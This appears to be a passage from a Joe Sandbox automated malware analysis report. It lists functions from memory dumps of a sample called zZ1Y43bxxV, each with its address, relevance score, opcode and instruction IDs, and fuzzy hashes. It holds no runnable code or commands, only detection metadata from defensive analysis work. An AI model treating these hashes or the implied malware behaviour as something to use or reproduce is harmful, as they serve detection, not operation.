                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 26ad2981fbd260144697f73fb1bb83e81e1a6d91b1d18edcd2ded5bef73e448a
                                                                                                                                                                    • Instruction ID: fbcdb3f8caeb39c54c4e1644fe214fc4b42308074b73445214c0a264c256cfa9
                                                                                                                                                                    • Opcode Fuzzy Hash: 26ad2981fbd260144697f73fb1bb83e81e1a6d91b1d18edcd2ded5bef73e448a
                                                                                                                                                                    • Instruction Fuzzy Hash: 0A110C30B14A188FCB98DF18D895A69B7F2FF59305F1142AED04ED76A6CB71AC41CB40
                                                                                                                                                                    Function 00007FFD9BA8D67E Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 48da0cd0721c895284f121aeb21e4c453ce3414f10255a6d98d6c324ee9a1349
                                                                                                                                                                    • Instruction ID: bac2d33a115d772d6acb196c1d926d1b4665765f4a21f050c93e1f7caeaab298
                                                                                                                                                                    • Opcode Fuzzy Hash: 48da0cd0721c895284f121aeb21e4c453ce3414f10255a6d98d6c324ee9a1349
                                                                                                                                                                    • Instruction Fuzzy Hash: F1014531318A0D4FE714DF6CE8697E67781EB94315F20023FD946C36E1CA75AA91C780
                                                                                                                                                                    Function 00007FFD9BA91BA8 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 99696b8acd8371e8b98808e99530d28a41e1aa3a163f2e4aeaeff25d898720a8
                                                                                                                                                                    • Instruction ID: 3afd57702ed0b2db2fcd45b1af0f0e404ef20ea2466905c2a4e69543ab0a08e9
                                                                                                                                                                    • Opcode Fuzzy Hash: 99696b8acd8371e8b98808e99530d28a41e1aa3a163f2e4aeaeff25d898720a8
                                                                                                                                                                    • Instruction Fuzzy Hash: 6B11E835E1981EDFDBA8DF98D4A09ACB7B2FF68300F510579D01AE3290DA746901DB50
                                                                                                                                                                    Function 00007FFD9BA81A30 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 86093c30ad8e81c6c0081ee2952dbee78f37ddfca93220963a03e9d21ec54c2b
                                                                                                                                                                    • Instruction ID: 1b758174a87ca6eb9326e00e0c5598741d8ead72a1b34b4dcc7be50ee9e5e241
                                                                                                                                                                    • Opcode Fuzzy Hash: 86093c30ad8e81c6c0081ee2952dbee78f37ddfca93220963a03e9d21ec54c2b
                                                                                                                                                                    • Instruction Fuzzy Hash: 65011A31A0891D8FDF90EF98D815AFEBBF1FB5C311F00043AE419E3294CA75A9508B91
                                                                                                                                                                    Function 00007FFD9BA83AAC Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: ef80351631c2a6316bece458f3e1d85a849cdca410a39c401b4b747c1b9954f4
                                                                                                                                                                    • Instruction ID: 6a2586489390c9c84afd7cabfbb23dceafb11709b8950d9c219d5e616db633dc
                                                                                                                                                                    • Opcode Fuzzy Hash: ef80351631c2a6316bece458f3e1d85a849cdca410a39c401b4b747c1b9954f4
                                                                                                                                                                    • Instruction Fuzzy Hash: 11011E30A15A0C8FD798DF68C8A9A69B7E1FF59305F1142AED04ED76B5CB71AD418B00
                                                                                                                                                                    Function 00007FFD9BA81E30 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 1742c5ec759a71a47bef95c2b185af3c2a19744004babe73d1ff5227c938c42d
                                                                                                                                                                    • Instruction ID: 17cd441cfbde777b478eadce705245c87cd16ea96f7494c48f8b77dcf5e70780
                                                                                                                                                                    • Opcode Fuzzy Hash: 1742c5ec759a71a47bef95c2b185af3c2a19744004babe73d1ff5227c938c42d
                                                                                                                                                                    • Instruction Fuzzy Hash: BC011E3061440A8ADB5DEF58E4D1DB6B351EFA931071042B5D4198B19FD938E992C7D0
                                                                                                                                                                    Function 00007FFD9BE40962 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 0be08d18226b1f02938a23c921eb19f2f647590d2d29624b6837387f5aceab6c
                                                                                                                                                                    • Instruction ID: 0fbd26cbebcaa0c4fa650d250f026a96256dc1f75c29a1623eada5bc9d1c1cf3
                                                                                                                                                                    • Opcode Fuzzy Hash: 0be08d18226b1f02938a23c921eb19f2f647590d2d29624b6837387f5aceab6c
                                                                                                                                                                    • Instruction Fuzzy Hash: 2CF0683244F2C99FE7128BB088615E57FB5AF83604B1500F6D595C70A3C56D1A06C751
                                                                                                                                                                    Function 00007FFD9BA8BE72 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: e71f05d11e57c6889ede2086bde72066483638fd84b83d4b4512c31dc7545689
                                                                                                                                                                    • Instruction ID: 742c37c866a341e1d661ae3cf50efa82b2fd934895d46fe79a328b5abe14b649
                                                                                                                                                                    • Opcode Fuzzy Hash: e71f05d11e57c6889ede2086bde72066483638fd84b83d4b4512c31dc7545689
                                                                                                                                                                    • Instruction Fuzzy Hash: 13F0903184E7C99FD3128BB0C8255A63FB4AF43204B1A01E6E485CB4B2C57D1716C762
                                                                                                                                                                    Function 00007FFD9BA832D2 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: ad317f12d23dec53efcfbd6bdccee8d5e26620cdd958226738420fdb51950ca8
                                                                                                                                                                    • Instruction ID: 322aaa3bf03ecb699a49a2708579aebd7e6949f7a484318e474c027f79f94338
                                                                                                                                                                    • Opcode Fuzzy Hash: ad317f12d23dec53efcfbd6bdccee8d5e26620cdd958226738420fdb51950ca8
                                                                                                                                                                    • Instruction Fuzzy Hash: BCF0963145E2C99FD3239BB088215963FB4AF53214B1A00E7F085CB4B2C97C5716C771
                                                                                                                                                                    Function 00007FFD9BA8A0D0 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 24fa8e6fb5d42e49bb8755999ed72f7ea7e04e73aa95a0be8ced0dbb0251b027
                                                                                                                                                                    • Instruction ID: 94fe63b66dea0694e55995e8853891aec37b52edbf126c52e6765e88d0acfc57
                                                                                                                                                                    • Opcode Fuzzy Hash: 24fa8e6fb5d42e49bb8755999ed72f7ea7e04e73aa95a0be8ced0dbb0251b027
                                                                                                                                                                    • Instruction Fuzzy Hash: 63F028A390FDCD6BF73187E498292226EA0DF53690B0600BEE0C8474F3B4D82A058340
                                                                                                                                                                    Function 00007FFD9BE48432 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 96380d79cd0e7605e8826a3adf9d5a25299ac3de0fc0e112f07f386160b06412
                                                                                                                                                                    • Instruction ID: d44915a221aa74d26895384fb25f66599b46bb49cbd864f43094ab07ccde376c
                                                                                                                                                                    • Opcode Fuzzy Hash: 96380d79cd0e7605e8826a3adf9d5a25299ac3de0fc0e112f07f386160b06412
                                                                                                                                                                    • Instruction Fuzzy Hash: 34F0623184E2CD9FD3169BB088615A97FA9AF43340F1A04F6D585C70A2C56E174AC762
                                                                                                                                                                    Function 00007FFD9BE480A4 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: a090f8e65044d45ef25d1b7f42da1debaef18a1ca345633da02fc6dc9e14053a
                                                                                                                                                                    • Instruction ID: c2141ccff7c5dce8b4c00202e2d8b7ad7bfdcd85f5691318773f6bb844a01d7a
                                                                                                                                                                    • Opcode Fuzzy Hash: a090f8e65044d45ef25d1b7f42da1debaef18a1ca345633da02fc6dc9e14053a
                                                                                                                                                                    • Instruction Fuzzy Hash: 4E016271A19A5D8EEBACDF188871B6477B2FF65340F0501FAC04DE32D2DA352A808B02
                                                                                                                                                                    Function 00007FFD9BA8CB6A Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 66a721aa5e45f3260e2df2ed6784af83ce272e4364b18be20a9a6b4826c0fd4d
                                                                                                                                                                    • Instruction ID: 1089308780ea97fb05b35e4777ab47823a93ada812cfeefff3d7771495d3d61d
                                                                                                                                                                    • Opcode Fuzzy Hash: 66a721aa5e45f3260e2df2ed6784af83ce272e4364b18be20a9a6b4826c0fd4d
                                                                                                                                                                    • Instruction Fuzzy Hash: 43F06232A0EAC94FDB229BA488A51A43FA09F1731071A05BAC4458B1E3E5AC25059B11
                                                                                                                                                                    Function 00007FFD9BA8D658 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 0ce111681001593765f20f83bfa24f35ad49d46bf0968111ca4ad652ba8aeead
                                                                                                                                                                    • Instruction ID: f9d9bd05e85349ac9df300d2bf5aeb6e782585a91c8e27091b34e7cb705be17c
                                                                                                                                                                    • Opcode Fuzzy Hash: 0ce111681001593765f20f83bfa24f35ad49d46bf0968111ca4ad652ba8aeead
                                                                                                                                                                    • Instruction Fuzzy Hash: 79F08270B2ED0E8BE6754BE4B5312B92A01AF55301F72063EC58EC28F1C97967025281
                                                                                                                                                                    Function 00007FFD9BA8413E Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 4014d2637945b01fa249033b180ee3a6d9e42d24a1dd0d493643fdaa68c8173d
                                                                                                                                                                    • Instruction ID: a36d44b60fb3c3058b3495bd0055e1f26987e9b9d749f8f9e32821a0eb07aabd
                                                                                                                                                                    • Opcode Fuzzy Hash: 4014d2637945b01fa249033b180ee3a6d9e42d24a1dd0d493643fdaa68c8173d
                                                                                                                                                                    • Instruction Fuzzy Hash: BBF0A771F19A885FDB59EBA484616683BE1EF49310B15016DD049C72D7DE3459428740
                                                                                                                                                                    Function 00007FFD9BA81DDF Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 5ba561641000dc72fc3e70b4388b5b7df3b0460b8178472cc8b16a023935a10f
                                                                                                                                                                    • Instruction ID: 528297ff8cf0c5f165fffa8d36c8a7ee6fcbade4fd9d97e8ae29e5ef7dde19ab
                                                                                                                                                                    • Opcode Fuzzy Hash: 5ba561641000dc72fc3e70b4388b5b7df3b0460b8178472cc8b16a023935a10f
                                                                                                                                                                    • Instruction Fuzzy Hash: 19E09A3080A60DCFEB65EF28C4416E97BA0FF59345F00012AE41CC2194CBB596A4CBC1
                                                                                                                                                                    Function 00007FFD9BE49C2B Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: e0e84db1c0953825c6a11af4ca712878906a4be45a9a3713c164707f23aba6fe
                                                                                                                                                                    • Instruction ID: 25249c4eac78dbea41860ebac666216d9418119c5300755e0c04c85611ec8021
                                                                                                                                                                    • Opcode Fuzzy Hash: e0e84db1c0953825c6a11af4ca712878906a4be45a9a3713c164707f23aba6fe
                                                                                                                                                                    • Instruction Fuzzy Hash: 99D09218B0E60F8DF2785683827823A71DB6F04700E62403DC05F618E1CA1EBB016201
                                                                                                                                                                    Function 00007FFD9BE4213B Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: a6dfca640fd1ff0a6acf096221b1ed235d4b352246173aef4cb6ad8510bf9eb6
                                                                                                                                                                    • Instruction ID: 6d04907b06fa772f8bd831e66928e4db92fd27b11645b70fc6ddf267a7e0cb51
                                                                                                                                                                    • Opcode Fuzzy Hash: a6dfca640fd1ff0a6acf096221b1ed235d4b352246173aef4cb6ad8510bf9eb6
                                                                                                                                                                    • Instruction Fuzzy Hash: E8D09214B2F61F85F53D4AE180B0239B2AA5F42701E264079C19F41AE1892ABB82A602
                                                                                                                                                                    Function 00007FFD9BA84ACB Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 7a4da925f387e1e342f5f6690e79ac1fabfe0c16eb6d7ca9cd3efe1488ce2fc4
                                                                                                                                                                    • Instruction ID: 57992e3e74720359e8ce5f5f59d4383cd995793bad2720fdf284edb68f7af426
                                                                                                                                                                    • Opcode Fuzzy Hash: 7a4da925f387e1e342f5f6690e79ac1fabfe0c16eb6d7ca9cd3efe1488ce2fc4
                                                                                                                                                                    • Instruction Fuzzy Hash: 0DD0C978B1FD1F85F1386782803033A9598AF04700E66443EC06F49CF5CDBD77016206
                                                                                                                                                                    Function 00007FFD9BA83FDF Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 4bf915828a75e0efd7b8144b9721b7d66fc471cc94de40a60ab237b1d94b0bfb
                                                                                                                                                                    • Instruction ID: 7f126647868449adff57eabb2d4464c1dac0c6203b3aebdacbbc9f5d6524adf0
                                                                                                                                                                    • Opcode Fuzzy Hash: 4bf915828a75e0efd7b8144b9721b7d66fc471cc94de40a60ab237b1d94b0bfb
                                                                                                                                                                    • Instruction Fuzzy Hash: 8DC04C50F0E68666E63112E408A207C16901B662007960576E506595E3DC9C6A055351
                                                                                                                                                                    Function 00007FFD9BE41671 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 304cb87df5bb0fa09ca4b9a65d4ec17989edd8592238712bad568bee1094c261
                                                                                                                                                                    • Instruction ID: 9f984b0daf2ac6e9364cb1ac3d5ee7c43107f5a8a3feb259581463a3c7591b06
                                                                                                                                                                    • Opcode Fuzzy Hash: 304cb87df5bb0fa09ca4b9a65d4ec17989edd8592238712bad568bee1094c261
                                                                                                                                                                    • Instruction Fuzzy Hash: 46B00200F0F70B57FA3415F4087517D14460B492C5B570B75D55B451F3DD9D7E401562
                                                                                                                                                                    Function 00007FFD9BE49143 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 9a387468d7b75d82c239a31dcb19fed649040a8da0d84f97847f4e505b71c53a
                                                                                                                                                                    • Instruction ID: 9cb1a4f53c9027b5bd1da59b5b3f14fb6e87430e7890a77aee4b6ff6d3a242e3
                                                                                                                                                                    • Opcode Fuzzy Hash: 9a387468d7b75d82c239a31dcb19fed649040a8da0d84f97847f4e505b71c53a
                                                                                                                                                                    • Instruction Fuzzy Hash: 3BB09204F0E20B4AE63410E104AC03C204B0B4A351A170930910A952E2DC4A2A006150

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 00007FFD9BA90578 Relevance: 6.1, Strings: 4, Instructions: 1103COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ._^$._^$;._^$>._^
                                                                                                                                                                    • API String ID: 0-954713821
                                                                                                                                                                    • Opcode ID: 6b160998178b753eba743d827126ab382ea0bf4551465cf6f4482514c1a41c23
                                                                                                                                                                    • Instruction ID: 64943eecebbe7cb24c1641c1382ca6b169483aa02cf0df6893adbd8677d57be2
                                                                                                                                                                    • Opcode Fuzzy Hash: 6b160998178b753eba743d827126ab382ea0bf4551465cf6f4482514c1a41c23
                                                                                                                                                                    • Instruction Fuzzy Hash: 4B72B753B0E1B64BD31AB76CBCB98E63B90CF4226C70941F7E0984F0E7EC58654B9285
                                                                                                                                                                    Function 00007FFD9BA906F2 Relevance: 4.6, Strings: 3, Instructions: 894COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ._^$;._^$=._^
                                                                                                                                                                    • API String ID: 0-1927262394
                                                                                                                                                                    • Opcode ID: 7522bb5a0b4167375006bc4cc48a173eaa8adab9c7767d91b3728413e1c9e2e4
                                                                                                                                                                    • Instruction ID: 061b748a187438e9a5de5c422db828707867a2268a710a7e6cd36671c47f8e33
                                                                                                                                                                    • Opcode Fuzzy Hash: 7522bb5a0b4167375006bc4cc48a173eaa8adab9c7767d91b3728413e1c9e2e4
                                                                                                                                                                    • Instruction Fuzzy Hash: 5352A753A0E1B64BD31AB76CBCB98E63F50DF4226C30941F7E0994F0E7EC58658B9245
                                                                                                                                                                    Function 00007FFD9B8BDDAD Relevance: .2, Instructions: 245COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1763457876.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 9f0544fede74b4134f86d75e29780aa493cb799a44f8579f7a44cee64e9009f5
                                                                                                                                                                    • Instruction ID: 7644aa5f9b0dc662db96bb7005704d753014f74df6ffb6ff2c45eb3255aa2b3b
                                                                                                                                                                    • Opcode Fuzzy Hash: 9f0544fede74b4134f86d75e29780aa493cb799a44f8579f7a44cee64e9009f5
                                                                                                                                                                    • Instruction Fuzzy Hash: D7816030A08A8D8FEBA8DF28C855BE977E1FF59311F10426EE84DC7291DB749945CB81
                                                                                                                                                                    Function 00007FFD9BA888FA Relevance: 7.8, Strings: 6, Instructions: 259COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
